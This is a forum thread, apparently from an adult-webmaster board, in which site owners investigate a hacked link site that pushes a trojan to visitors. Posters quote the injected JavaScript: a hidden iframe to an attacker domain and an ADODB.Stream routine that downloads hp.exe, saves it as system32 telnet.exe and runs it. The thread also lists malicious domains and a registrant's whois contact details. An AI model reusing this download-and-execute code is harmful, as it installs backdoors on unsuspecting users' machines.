Trojan on Tommys Bookmarks?
 

Am I the only one who gets a Trojan report when I go to
http://www.tommys-bookmarks.com/pmpegs.shtml

A pop-up is loading and I can't close it anymore. I have to completely shut down IE. This is what McAfee reports:
http://www.hostones.com/temp/tommysbookmarks.JPG

...

norton gives me trojan too
you'll better contact him since it seems his server got hacked.

Tommy is aware of this and is working like a madman to try to find the source. This one isn't very obvious. Where are you guys connecting from? It might be geo.

Alex

i get a popup that is blocked by sp2


from usa

Me from the Netherlands
It seems like this trojan only shows up the first time you visit the page. Only after I remove all my cookies it shows up again!

Hi Alex, connecting from Greece

Hmm, I didn't get any alerts. Canada.

It's loading from: http://www.zerosexxx.com/fnp/md.htm



Registrant:
roxy
45 av bordeaux
paris, paris 75000
US

Registrar: DOTSTER
Domain Name: ZEROSEXXX.COM
Created on: 29-MAY-02
Expires on: 29-MAY-05
Last Updated on: 04-MAY-04

Administrative Contact:
dove, sebring [email protected]
roxy
45 av bordeaux
paris, paris 75000
US
0125259785
0124249874

Technical Contact:
dove, sebring [email protected]
roxy
45 av bordeaux
paris, paris 75000
US
0125259785
0124249874


Domain servers in listed order:
NS1.CANDIDHOSTING.COM
NS2.CANDIDHOSTING.COM

hahahahahahahaha language=j a v a s c r i p t> var bname=navigator.appName; if (bname = = 'Microsoft Internet Explorer') document.write('<iframe src="http://www.zerosexxx.com/fnp/console.htm" width=1 height=1 st yle="position :absolute; visibility: hidden"></iframe>');}</hahahahahahahaha

if you have a cookie set it vanishes

also same whois under:

dont click them all have viruses
www.Clamide-galleries.com
www.Clito57.com
www.Fatasshole.com
www.Fucks-pussy.com
www.Hardclito.com
www.Monsteract.com
www.Pornfree-gals.com
www.Ustimerz.com
www.Zerosexxx.com

What does it do exactly?


var downloadurl="http://www.zerosexxx.com/fnp/hp.exe?3";

if(navigator.appVersion.hahahahahahaha("Windows NT 5.1")!=-1) savetopath="C:\\WINDOWS\\system32\\telnet.exe";
if(navigator.appVersion.hahahahahahaha("Windows NT 5.0")!=-1) savetopath="C:\\WINNT\\system32\\telnet.exe";
payloadURL = downloadurl;

var x = new ActiveXObject("Microsoft.XMLHTTP");
xhahahahahaha("GET",payloadURL,0);
x.Send();
function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }
var s = new ActiveXObject(bla());
s.Mode = 3;
s.Type = 1;
shahahahahaha();
s.Write(x.responseBody);
s.SaveToFile(savetopath,2);
location.href = "telnet://";


Secret dialer ?

Where do you have all these domains from? You already have dealt with this guy?

I clicked the first link. Holy fuck. McAfee kept reporting and reporting :ak47:

whois.sc

it's not a dialer

the trojan downloads a backdoor file with the name telnet and it connects on an IRC server from what I read on a security forum.

Everyone has a price.
Im sure he is making good money off that.
I love the: Oh I dunno where its from excuse.

Za Ha, you are a funny shit. Tommy is one VERY good egg in this business. Trust me, he is pulling his hair out over this one. His entire reputation is on the line. Nobody would be stupid enough to blow a business almost 10 years old an obviously illegal hack.

That is the 4th TGP / link site that I have seen hacked in the last 2 weeks. The fucking assholes of the world are really pushing it.

Alex

Soul Rebel, that sort of behavior is similar to "egg drop" that would be on a unix box - it allows a person remotely to trigger a Denial of Service attack from many machines remotely only by entering a key phrase into an IRC chatroom.

It can also trigger other things, such as the downloading to a specific email address of personal info from the machine, email address lists, or any other informaiton located on the system infected. It would also allow for the installation of additional software without the end user's knowledge, such as a key logger or password trapper.

This is a VERY powerful hack, not script kiddie stuff. Even reading the symantic website, you will see a certain amount of respect for the level of BS that went into making this sort of hack work.

It's pros... not amateurs - and it's dangerous.

Alex

eggdrop is just a normal IRC bot to keep your channel open (nothing to launch DDoS attacks)

URL plz

Alex, who are you exactly?
I have sent Tommy an email, because I'm trading with him. please make sure that he is getting back to me about this issue. Thanks

Oh and I'm pretty sure Za Ha is wrong. I can't believe that Tommy would ever do this. Only thing is that I have really no clue how this shit can load from his site. I have checked my own computer for any spyware shit and are very confident that there is nothing installed.

All this traffic stealing is getting out of hand. 2% of my own traffic is getting stolen. This is my main issue to solve the coming months.

No doubt Tommy didn't do that.

more about it here

http://216.239.59.104/search?q=cache...22s.SaveToFile(savetopath,2)%3B+%22&hl=en

Alex,i'm mailing you a possible valid US address of the domain owner.

FreeOnes
Tommy is aware of it. He actually received an email from a surfer is how he first found out and like Alex said is trying to figure out exactly how it is all happening.

Alex? He's been in the biz a long long time. Runs several link sites and of course knows Tommy and has for years. :)

Freeones, just another link site owner... nothing serious! Trust me, tommy has his hands full getting rid of this one.

Microsoft link on the subject:

http://www.microsoft.com/security/in...load_ject.mspx

You can have the "how to" pf the exploi t here. it really does require some interesting timing to trigger properly!

http://www.securiteam.com/securityre...HP0120D5W.html

Nastyking, eggdrop is key because it puts the infected computer in connection with an IRC server without permission, and listens for commands. This is the first step of a "multi homed" denial of service attack or other malicious behavior commanded remotely.

It's hack, pure and simple.

Alex

Ah yes. My good "friend" "roxy". This "guy" has been spamming cheating galleries for a few years now at least. And a lot of those other sites like Clito57. Again, redirecting/cheating galleries, "fake" TGPs with crappy/cheating traffic trading etc. "He" has even more than that. You just found his "bad" stuff, I believe (although I haven't 100% confirmed it yet) that he was a more "acceptable" buffer between some of that stuff and everyone else. A bunch of you probably even traffic trade and stuff with him... Gotta love this business..

Thanks for the info though, I need to add some of that into my DNS/Registrar checker for traffic trades and gallery submitters. :thumbsup

soul_rebel, didn't get email, can send to rawalex hotmail please....?

Alex

Alex, that's where i sent it. Any other email? Although I just noticed the domain appeared for a period to an expired domain list and probably the address points to wrong person.

Okay, I got it. That info is useful mostly because it tipped me off to look at something else (see email) that might give a clue or two.

Interesting.

Alex

This is very odd I see Candid Hosting in this thread, the same thing happened to my TGP which is a good size. This is exactly why I switched from Candid Hosting last month because my site was loading trojan's all the sudden several times over a 2 week period. None of the support team could find anything that was causing someone to change my site. It hasn't happened since I moved from Candid Hosting to a new sever over a month ago.

I hate them all :321GFY

It seems that the problem is fixed now. :thumbsup

heree too

Cleaning up after on of these things takes some time. Tommy is re-arranging the furniture and looking for them little bugs hiding in the corners. Let's just say he has NOT had a nice labor day weekend off.

Things should be 100% normal again in a day or so.

Alex

Alex, why I didn't hear back from Tommy after 2 emails?
I really expect a reply. 2% of my traffic is stolen everyday by these kind of fucking trojan shit. Everybody who is suspicious gets blacklisted from now on. I wouldn't expect Tommy would ever put this on his site, but I need a good explanation for it. If I don't get replies on my emails you make yourself suspicious no matter who you are.

Hi Maurice

you were told the site was hacked.
we dont trade traffic,
so after that its really none of your buisness.

I think your emails and posts have been a little rude

I anwsered your emails twice, I said I would let you know as soon as servint had some info for me

if you want some information you should ask nicely, not like this

we are hosted at the same company, the same sales person handles our accounts, if you really wanted to know what happened you could just email servint and ask them

owned

tommy is a good guy :thumbsup i'm sure thing will get fixed asap. greetings to steve!

Man, people who would even think Tommy or Cosis there would ever load shit like this on purpose need to get a grip.. seriously..

It is interesting to note that 1 hosting company was/is hosting both sites when the problem popped up at first. I bet they'd like to know that to see if they have a backdoor open somewhere.

well I use opera so all popups are blocked anyways :thumbsup